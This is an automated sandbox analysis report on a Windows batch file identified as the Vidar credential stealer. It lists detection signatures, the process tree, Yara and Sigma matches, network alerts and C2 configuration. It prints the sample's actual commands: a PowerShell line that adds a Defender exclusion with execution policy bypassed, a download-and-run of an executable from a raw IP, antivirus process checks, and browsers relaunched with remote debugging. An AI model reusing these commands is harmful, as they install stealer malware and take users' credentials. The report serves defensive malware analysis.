Windows Analysis Report
skript.bat

Overview

General Information

Sample name: skript.bat
Analysis ID: 1581178
MD5: 0e57d68f00781ca58e94c012b16f9f5e
SHA1: 6343fe57d26c64e02e1b9d5df7fe106c77946d59
SHA256: d5f7403aaf2fb3c03a0f60e0f9834504c81bbb5633d8eadfe5854b1cc28c84c8
Tags: bat, Vidar, user-lontze7

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Monitors registry run keys for changes
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6716 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • WmiPrvSE.exe (PID: 3060 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • timeout.exe (PID: 7232 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • powershell.exe (PID: 7456 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • putt.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Local\Temp\putt.exe" MD5: 5782BEA403267E4A6DDF82263332ED59)
      • cmd.exe (PID: 8008 cmdline: "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8112 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 8120 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 8160 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 8168 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 6532 cmdline: cmd /c md 105235 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 6500 cmdline: extrac32 /Y /E Authorization MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 1596 cmdline: findstr /V "aid" Division MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 776 cmdline: cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 5172 cmdline: cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Inf.com (PID: 6636 cmdline: Inf.com m MD5: 62D09F076E6E0240548C2F837536A46A)
          • chrome.exe (PID: 5332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • chrome.exe (PID: 7472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2332,i,17273091767045928010,3792722135638542356,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • msedge.exe (PID: 7360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
            • msedge.exe (PID: 3432 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2632,i,14551711620527519390,4323206914128980996,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
        • choice.exe (PID: 508 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • svchost.exe (PID: 7856 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 6432 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 3880 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 1828 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5340 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 5344 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6652 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 7528 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 7512 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
skript.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000001A.00000003.2971521152.0000000003F86000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000001A.00000003.2971737900.00000000041E8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000001A.00000002.3399642735.000000000103F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
26.2.Inf.com.41e0000.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
26.2.Inf.com.41e0000.1.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io |
  • 0x2068c:$str01: MachineID:
  • 0x1f051:$str02: Work Dir: In memory
  • 0x206c3:$str03: [Hardware]
  • 0x20675:$str04: VideoCard:
  • 0x1fce5:$str05: [Processes]
  • 0x1fcf1:$str06: [Software]
  • 0x1f1bb:$str07: information.txt
  • 0x20398:$str08: %s\*
  • 0x203e5:$str08: %s\*
  • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
  • 0x1fb61:$str12: UseMasterPassword
  • 0x206cf:$str13: Soft: WinSCP
  • 0x2016e:$str14: <Pass encoding="base64">
  • 0x206b2:$str15: Soft: FileZilla
  • 0x1f1ad:$str16: passwords.txt
  • 0x1fb8c:$str17: build_id
  • 0x1fc80:$str18: file_data

Source | Rule | Description | Author | Strings
amsi64_7456.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", ProcessId: 7456, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", ProcessId: 6716, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", ProcessId: 6716, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", ProcessId: 6716, ProcessName: powershell.exe
Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Inf.com m, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, ParentProcessId: 6636, ParentProcessName: Inf.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 5332, ProcessName: chrome.exe
Source: Process started, Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", ProcessId: 6716, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", ProcessId: 7456, ProcessName: powershell.exe
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", ProcessId: 7456, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", ProcessId: 6716, ProcessName: powershell.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7856, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8008, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 8168, ProcessName: findstr.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T07:09:31.597895+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49773 | 5.252.155.64 | 80 | TCP
2024-12-27T07:10:44.485231+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.6 | 49939 | TCP
2024-12-27T07:10:46.979430+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.6 | 49945 | TCP
2024-12-27T07:10:42.007109+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.6 | 49933 | 188.245.216.205 | 443 | TCP
2024-12-27T07:10:39.619043+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49927 | 188.245.216.205 | 443 | TCP

AV Detection

Source: http://5.252.155.64/lem.exe#, Avira URL Cloud: Label: malware
Source: http://5.252.155.64/lem.exe, Avira URL Cloud: Label: malware
Source: https://bijutr.shop/op, Avira URL Cloud: Label: malware
Source: https://bijutr.shop/TE, Avira URL Cloud: Label: malware
Source: https://bijutr.shop/h$, Avira URL Cloud: Label: malware
Source: 0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.6% probability
Source: unknown, HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49789 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49817 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49837 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49892 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49902 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49915 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49921 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49954 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\putt.exe, Code function: 14_2_00406301 FindFirstFileW,FindClose,14_2_00406301
Source: C:\Users\user\AppData\Local\Temp\putt.exe, Code function: 14_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00406CC7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 26_2_0075DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_0075DC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 26_2_0076A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_0076A087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 26_2_0076A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_0076A1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 26_2_0075E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,26_2_0075E472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 26_2_0076A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,26_2_0076A570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 26_2_0072C622 FindFirstFileExW,26_2_0072C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 26_2_007666DC FindFirstFileW,FindNextFileW,FindClose,26_2_007666DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 26_2_00767333 FindFirstFileW,FindClose,26_2_00767333
